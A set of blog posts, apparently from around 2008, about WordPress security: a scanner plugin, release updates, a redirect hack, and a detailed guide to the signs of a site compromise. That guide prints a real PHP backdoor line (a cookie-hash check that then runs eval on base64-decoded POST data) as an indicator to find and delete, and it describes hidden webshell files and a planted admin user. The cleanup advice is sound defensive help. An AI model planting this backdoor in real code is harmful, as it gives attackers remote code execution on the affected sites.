WordPress Plugin: WordPress Exploit Scanner
With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.
This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.
It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.
Download WordPress Exploit Scanner
More WordPress blogs being hacked
Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.
The recent security issues concern hackers who work with Google and other search engine results and redirects traffic from your blog or website. The searchers clicks on the link and is redirected to the hacker’s site with the same search string used to search in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.
Read Lorelle’s post for more information on detecting and eliminating this security issue.
WordPress 2.5.1 Released, But You Can’t Reset Passwords and 2.5.2 is Close Behind; Will You Update?
Just as Filipino bloggers trooped to U.P. Diliman for the 4th iBlog Summit, WordPress 2.5.1 was released. It has over 70 security fixes and enhancements, including a SECRET_KEY in the wp-config.php file explained in-depth by Ryan Boren.
Now it seems people are debating whether one should hold off for the next WordPress version for several reasons. First, there’s a bug that can potentially lock people out of their blogs should they wish to reset their passwords. This can be fixed by manually editing the password through phpMyAdmin, and there’s a patch for the WordPress update itself.
Second, there’s talk that WordPress 2.5.2 will soon be out. This could frustrate a lot of bloggers who aren’t really comfortable with updating WordPress.
So will you upgrade to 2.5.1 immediately, or wait until 2.5.2 comes out? I’d say it has a lot to do with how confident you are in the blog security of your current installation.
Has Your WordPress Been Hacked Recently?
Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:
Extra code added to the first line of PHP files
<?php if(md5($_COOKIE['_wp_debugger'])==”dfa1bcf40aa72fdb46ed40f7651fe76e”){ eval(base64_decode($_POST['file'])); exit; } ?>
Note that the letters numbers and numbers vary.
Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.
New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories
See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.
Solution: delete the files.
New files named wp-info.txt which contain database usernames and passwords
This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.
Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.
New “WordPress” user in database (hidden in the admin panel users page)
One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.
Solution: delete the user. You need to access your database through phpMyAdmin or something similar.
WordPress version changed to 2.5
I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.
Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.
More signs
The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.
Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.
More Solutions
When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.
However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!
Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.
I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.
Update (April 17): There’s now a WordPress Codex page for this issue.
Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).
Update (June 10): Check out this very helpful post by Donncha O Caoimh.
Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed
Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.
Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.
Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.
I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!
WordPress 2.5’s New Password Hashing Scheme
Ryan Boren tells us there’s a new password hashing scheme in WordPress 2.5 (along with a new format for cookie authentication). Why is this important for WordPress users with little knowledge about security?
If you share your users table with other applications or with other WordPress blogs that won’t be upgrading to 2.5 all at once, you’ll probably want to continue using MD5 hashes rather than the new hashes.
Thankfully there’s a WordPress plugin that allows us to continue using MD5 hashes. He strongly recommends us to install and run it once we upgrade to 2.5.
Users that login prior to installation of the plugin will get the new hashes, but after the plugin is active those users will be moved back to MD5 upon their next log in. If you ever want to move to the new hashes, just deactivate the plugin.
Update to WordPress 2.3.3 Now!
Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.
Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.
Check out the whole announcement at the official WordPress blog.
WordPress 2.3.1
The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.
